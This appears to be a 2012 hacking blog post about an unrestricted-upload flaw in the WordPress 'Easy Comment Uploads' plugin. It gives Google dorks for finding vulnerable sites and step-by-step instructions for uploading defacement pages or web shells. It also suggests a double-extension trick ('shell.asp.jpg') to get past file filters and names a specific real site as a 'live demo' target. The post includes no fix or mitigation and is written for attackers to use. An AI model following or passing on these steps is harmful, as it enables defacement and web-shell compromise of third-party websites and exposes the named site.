Banner 468 x 60px

LikeViews

Sunday, 15 January 2012

New Wordpress Exploit : 10K+ Websites vulnerable through this attack

Comments
WordPress Easy Comment Upload Vulnerability:

Google Dork:
  • "inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"  
  • /wp-content/plugins/easy-comment-uploads/upload-form.php 
  • Index of /wp-content/plugins/easy-comment-uploads

Open Google and enter any dork given above..
Now selct any website 
and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll Get Upload Option here :)
Now Upload Your Deface ....
and check it here site.com/wp-content/uploads/2011/05/yourfilehere


Note :- In some websites you can Upload your deface in .txt on only ... and you can upload shell in 50% sites only ... upload shell in image format i.e. shell.asp.jpg


Live Demo :- 
http://www.findthepearl.com/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/upload-form.php

 


 
Convex Coders © 2011 Convex-Coders. Supported by Code 104 and tech PANELS